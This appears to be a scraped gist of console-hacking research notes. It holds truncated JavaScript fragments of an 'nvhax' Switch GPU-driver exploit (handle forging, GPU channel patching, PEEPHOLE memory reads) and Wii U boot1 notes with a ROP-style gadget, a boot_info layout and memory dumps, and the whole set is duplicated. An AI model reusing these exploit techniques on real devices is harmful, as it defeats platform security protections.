hexkyz

## sploitcore_nvhax.js
/*
    nvhax exploit
*/
// Global nvservices exploit context
sploitcore.prototype.nvdrv_exp_ctx = {};

sploitcore.prototype.spawn_nvdrv_srv = function(sm_handle, transf_mem_addr, transf_mem_size) {
    // Forge a new service handle for NVDRV
    var srv_handle = this.forge_handle(sm_handle, "nvdrv:t");


## nvhax_find_channel.js
sploitcore.prototype.nvhax_find_channel = function(hw_num) {
    var mem_info_addr = utils.add2(this.nvdrv_exp_ctx[6], 0x40000);
    var page_info_addr = utils.add2(this.nvdrv_exp_ctx[6], 0x40100);
    var test_addr = [0, 0];
    var ch_base_addr = [0, 0];

    // Look for user channel
    while (test_addr[1] < 0x80)
    {
        var result = this.nvhax_svc(0x06, [mem_info_addr, page_info_addr, test_addr], [], false);

## nvhax_patch_channel.js
sploitcore.prototype.nvhax_patch_channel = function(ch_base_addr, target_paddr) {
    // Map GPU MMIO
    var gpu_io_vaddr = this.nvhax_map_io(0x57000000, 0x01000000);

    // Page directory is always at channel + 0x15000
    var pdb_vaddr = utils.add2(ch_base_addr, 0x15000);

    // Read page directory base IOVA
    var pdb_iova_lo = this.nvhax_read32(utils.add2(ch_base_addr, 0x200));
    var pdb_iova_hi = this.nvhax_read32(utils.add2(ch_base_addr, 0x204));

## nvhax_peephole.js
sploitcore.prototype.nvhax_peephole_dump_mem = function(ch_iova, gpu_va, mem_size) {
    // Map GPU MMIO
    var gpu_io_vaddr = this.nvhax_map_io(0x57000000, 0x01000000);

    // Write the channel's iova in PEEPHOLE PBUS register
    this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x1718), (0x80000000 | ch_iova));

    // Write the GPU virtual address in PEEPHOLE registers
    this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x6000C), gpu_va[1]);
    this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x60010), gpu_va[0]);

## boot1_boot_info_pseudocode.c
// Do some boring stuff
...

// Decrypt PRSH/PRST with Starbuck ancast key
sub_D400320(0x10000400, 0x7C00, iv);

// Parse PRSH/PRST
sub_D40B030(0x10000400, 0x7C00);

// Locate or create new "boot_info"

## boot1_target_hex.txt
0D40AC6C  20 00 BC 0E 46 93 46 9D 47 08 00 00

## boot1_target.txt
0D40AC6C                 MOVS            R0, #0
0D40AC6E                 POP             {R1-R3}
0D40AC70                 MOV             R11, R2
0D40AC72                 MOV             SP, R3
0D40AC74                 BX              R1

## boot_info.txt
0x00000000: 0x00000001	// Always 1 (set by boot1 on coldboot)
0x00000004: 0xA6000000	// Boot flags (0x80 means data is set)
0x00000008: 0x00000000	// Boot state
0x0000000C: 0x00000001	// Boot count (increased by boot1 on reset)
0x00000010: 0x00100000	// Set to 0 by boot1 on coldboot
0x00000014: 0x00000000	// Set to 0 by boot1 on coldboot
0x00000018: 0xFFFFFFFF	// Set to -1 by boot1 on coldboot
0x0000001C: 0xFFFFFFFF	// Set to -1 by boot1 on coldboot
0x00000020: 0xFFFFFFFF	// Set to -1 by boot1 on coldboot
0x00000024: 0xFFFFFFFF	// Set to -1 by boot1 on coldboot

## prsh_sections.txt
Name:     "boot_info"
Address:  0x10008000
Size:     0x00000058
UNK:      0x80000000

Name:     "mcp_crash_region"
Address:  0x100F7F60
Size:     0x000080A0
UNK:      0x80000000


## 0x10000000.txt
0x10000000: 12 34 56 78 9A BC DE F0 12 34 56 78 9A BC DE F0
...
0x100003F0: 12 34 56 78 9A BC DE F0 12 34 56 78 9A BC DE F0
0x10000400: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
...
0x10005A40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10005A50: 00 00 00 00
0x10005A54: PRSH XOR checksum
0x10005A58: "PRSH"      // magic
0x10005A5C: 0x00000001  // version (0 or 1)
	/*
	nvhax exploit
	*/
	// Global nvservices exploit context
	sploitcore.prototype.nvdrv_exp_ctx = {};

	sploitcore.prototype.spawn_nvdrv_srv = function(sm_handle, transf_mem_addr, transf_mem_size) {
	// Forge a new service handle for NVDRV
	var srv_handle = this.forge_handle(sm_handle, "nvdrv:t");
	sploitcore.prototype.nvhax_find_channel = function(hw_num) {
	var mem_info_addr = utils.add2(this.nvdrv_exp_ctx[6], 0x40000);
	var page_info_addr = utils.add2(this.nvdrv_exp_ctx[6], 0x40100);
	var test_addr = [0, 0];
	var ch_base_addr = [0, 0];

	// Look for user channel
	while (test_addr[1] < 0x80)
	{
	var result = this.nvhax_svc(0x06, [mem_info_addr, page_info_addr, test_addr], [], false);
	sploitcore.prototype.nvhax_patch_channel = function(ch_base_addr, target_paddr) {
	// Map GPU MMIO
	var gpu_io_vaddr = this.nvhax_map_io(0x57000000, 0x01000000);

	// Page directory is always at channel + 0x15000
	var pdb_vaddr = utils.add2(ch_base_addr, 0x15000);

	// Read page directory base IOVA
	var pdb_iova_lo = this.nvhax_read32(utils.add2(ch_base_addr, 0x200));
	var pdb_iova_hi = this.nvhax_read32(utils.add2(ch_base_addr, 0x204));
	sploitcore.prototype.nvhax_peephole_dump_mem = function(ch_iova, gpu_va, mem_size) {
	// Map GPU MMIO
	var gpu_io_vaddr = this.nvhax_map_io(0x57000000, 0x01000000);

	// Write the channel's iova in PEEPHOLE PBUS register
	this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x1718), (0x80000000 \| ch_iova));

	// Write the GPU virtual address in PEEPHOLE registers
	this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x6000C), gpu_va[1]);
	this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x60010), gpu_va[0]);
	// Do some boring stuff
	...

	// Decrypt PRSH/PRST with Starbuck ancast key
	sub_D400320(0x10000400, 0x7C00, iv);

	// Parse PRSH/PRST
	sub_D40B030(0x10000400, 0x7C00);

	// Locate or create new "boot_info"
	0D40AC6C MOVS R0, #0
	0D40AC6E POP {R1-R3}
	0D40AC70 MOV R11, R2
	0D40AC72 MOV SP, R3
	0D40AC74 BX R1
	0x00000000: 0x00000001 // Always 1 (set by boot1 on coldboot)
	0x00000004: 0xA6000000 // Boot flags (0x80 means data is set)
	0x00000008: 0x00000000 // Boot state
	0x0000000C: 0x00000001 // Boot count (increased by boot1 on reset)
	0x00000010: 0x00100000 // Set to 0 by boot1 on coldboot
	0x00000014: 0x00000000 // Set to 0 by boot1 on coldboot
	0x00000018: 0xFFFFFFFF // Set to -1 by boot1 on coldboot
	0x0000001C: 0xFFFFFFFF // Set to -1 by boot1 on coldboot
	0x00000020: 0xFFFFFFFF // Set to -1 by boot1 on coldboot
	0x00000024: 0xFFFFFFFF // Set to -1 by boot1 on coldboot
	Name: "boot_info"
	Address: 0x10008000
	Size: 0x00000058
	UNK: 0x80000000

	Name: "mcp_crash_region"
	Address: 0x100F7F60
	Size: 0x000080A0
	UNK: 0x80000000
	0x10000000: 12 34 56 78 9A BC DE F0 12 34 56 78 9A BC DE F0
	...
	0x100003F0: 12 34 56 78 9A BC DE F0 12 34 56 78 9A BC DE F0
	0x10000400: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
	...
	0x10005A40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
	0x10005A50: 00 00 00 00
	0x10005A54: PRSH XOR checksum
	0x10005A58: "PRSH" // magic
	0x10005A5C: 0x00000001 // version (0 or 1)